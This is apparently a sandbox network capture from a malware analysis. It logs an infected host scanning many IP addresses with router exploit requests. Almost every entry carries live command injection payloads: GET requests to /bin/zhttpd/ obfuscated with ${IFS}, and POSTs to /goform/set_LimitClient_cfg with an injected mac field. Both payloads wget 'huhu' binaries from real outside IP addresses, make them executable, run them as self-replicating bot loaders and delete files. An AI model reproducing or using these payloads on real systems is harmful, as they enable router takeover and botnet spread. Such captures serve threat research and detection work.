                                              Jan 29, 2024 07:04:05.321554899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8248192.168.2.1456014186.0.25.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321602106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8249192.168.2.1438372105.185.113.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321608067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8250192.168.2.1454930109.75.152.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321662903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8251192.168.2.146015666.63.68.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321686983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8252192.168.2.1453634159.37.216.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321727991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8253192.168.2.1456710125.38.104.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321760893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8254192.168.2.145579648.41.137.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321794987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8255192.168.2.1449794209.152.233.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321818113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8256192.168.2.14536388.196.47.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321863890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8257192.168.2.1453444126.196.96.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.324805975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8258192.168.2.1437562159.207.9.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.325154066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8259192.168.2.1443126207.107.126.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.325186014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8260192.168.2.1445772194.38.29.2258080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.202763081 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:06.441375971 CET1286INHTTP/1.0 400 Bad Request
                                              Server: squid/3.1.23
                                              Mime-Version: 1.0
                                              Date: Mon, 29 Jan 2024 05:32:14 GMT
                                              Content-Type: text/html
                                              Content-Length: 3181
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8261192.168.2.1460264103.193.195.2078080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.301232100 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:08.042064905 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:10.221967936 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8262192.168.2.1455116104.17.197.1458080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.320662022 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:06.437637091 CET328INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 29 Jan 2024 06:04:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8263192.168.2.1457024130.241.17.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.321892977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8264192.168.2.1453310151.105.46.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.321966887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8265192.168.2.143861041.15.238.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.321995020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8266192.168.2.1457614218.130.232.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322040081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8267192.168.2.144543019.234.254.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322066069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8268192.168.2.145585080.156.111.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322139978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8269192.168.2.1459122218.134.132.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322169065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8270192.168.2.145465674.80.121.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322241068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8271192.168.2.1433950118.232.50.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322256088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8272192.168.2.143611480.134.75.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322292089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8273192.168.2.144592223.224.189.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322324038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8274192.168.2.145718038.233.171.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322356939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8275192.168.2.144717091.244.66.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322393894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8276192.168.2.1448306220.62.4.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322421074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8277192.168.2.1447462153.171.153.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322474003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8278192.168.2.1439558169.193.77.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322514057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8279192.168.2.1437694177.52.143.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322561979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8280192.168.2.1432912104.220.198.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322581053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8281192.168.2.145371054.92.37.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322612047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8282192.168.2.145627289.88.80.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322642088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8283192.168.2.14393001.16.154.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322674990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8284192.168.2.14405285.175.104.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:06.322702885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8285192.168.2.1453312205.141.57.45443
                                              TimestampBytes transferredDirectionData
